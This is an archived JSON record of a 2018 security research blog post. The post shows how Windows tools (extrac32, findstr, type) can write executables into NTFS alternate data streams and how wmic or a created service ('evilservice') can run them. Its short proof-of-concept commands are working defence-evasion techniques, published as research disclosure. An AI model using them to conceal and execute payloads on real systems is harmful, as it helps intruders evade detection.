{
	"id": "41d83c05-d51d-440c-926f-c089fa191cb0",
	"created_at": "2026-04-06T00:19:40.474345Z",
	"updated_at": "2026-04-10T03:20:51.897377Z",
	"deleted_at": null,
	"sha1_hash": "700aa689e031649e97735bbf1214271f73782077",
	"title": "Putting data in Alternate data streams and how to execute it – part 2",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 193405,
	"plain_text": "Putting data in Alternate data streams and how to execute it – part 2\r\nPublished: 2018-04-11 · Archived: 2026-04-05 13:39:09 UTC\r\nI wrote a blogpost a while back about Alternate data streams that you can find\r\nhere: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nAfter I wrote that post I have made some new discoveries that I wanted to share around Alternate data streams. As\r\nyou probably already know if you read some of my stuff, I am a big fan of Living off the land techniques.\r\nThe only method I knew about to inject data into an alternate data stream when I wrote the first post was the “type”\r\ncommand.\r\nI have since my last blogpost discovered some other techniques as well. These techniques I have discovered can of\r\ncourse have been discovered by others and already been blogged about; if so, please let me know and I will link to\r\nyour blogpost.\r\nEXTRAC32.EXE\r\nFirst up is extrac32. If you do not know this command you can read more about it\r\nhere: https://ss64.com/nt/extract.html\r\nBasically what you use it for is to extract cab files. What I figured out was that you also can use this command to\r\nadd alternate data streams. 
The PoC for doing this (including creating a CAB) looks like this:\r\necho \"empty file\" \u003e c:\\ADS\\file.txt\r\nmakecab c:\\ADS\\procexp.exe c:\\ADS\\procexp.cab\r\nextrac32 C:\\ADS\\procexp.cab c:\\ADS\\file.txt:procexp.exe\r\nwmic process call create '\"c:\\ADS\\file.txt:procexp.exe\"'\r\nhttps://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\r\nPage 1 of 4\n\nFINDSTR.EXE\r\nIn my research I also found that Findstr can be used to inject a payload into another file as an ADS stream.\r\nFindstr.exe is basically a command you use to find strings within files.\r\nMore about the binary here: https://ss64.com/nt/findstr.html\r\nThe cool thing I figured out was that you can search for a string that does not exist in a file and pipe that into a\r\nnew file. And the cool thing is that it does allow it to be piped into an ADS stream of a file. It looks like this:\r\necho \"empty file\" \u003e c:\\ADS\\file.txt\r\nfindstr /V /L W3AllLov3DonaldTrump c:\\ADS\\procexp.exe \u003e c:\\ADS\\file.txt:procexp.exe\r\nwmic process call create '\"c:\\ADS\\file.txt:procexp.exe\"'\r\nThe /V in the findstr command makes sure that everything that does not match the string I am searching for is\r\nshown. 🙂\r\nExecuting ADS binary\r\nI found another way to execute a binary from an alternate data stream when I was digging into this. 
It is possible to\r\ncreate a service in Windows (this requires local admin rights) that executes content from an Alternate Data Stream.\r\nI use the SC command to execute the necessary commands to create the service as I want using these commands:\r\necho \"empty file\" \u003e c:\\ADS\\file.txt\r\ntype c:\\windows\\system32\\cmd.exe \u003e c:\\ADS\\file.txt:cmd.exe\r\nsc create evilservice binPath= \"\\\"c:\\ADS\\file.txt:cmd.exe\\\" /c echo works \u003e \\\"c:\\ADS\\works.txt\\\"\" Dis\r\nsc start evilservice\r\nAnd it looks like this:\r\nThat’s all for this time. I have also updated my ADS gist here for other\r\nmethods: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\r\nHope you liked the post and as always I appreciate feedback. 🙂\r\nSource: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/"
	],
	"report_names": [
		"putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2"
	],
	"threat_actors": [],
	"ts_created_at": 1775434780,
	"ts_updated_at": 1775791251,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/700aa689e031649e97735bbf1214271f73782077.pdf",
		"text": "https://archive.orkl.eu/700aa689e031649e97735bbf1214271f73782077.txt",
		"img": "https://archive.orkl.eu/700aa689e031649e97735bbf1214271f73782077.jpg"
	}
}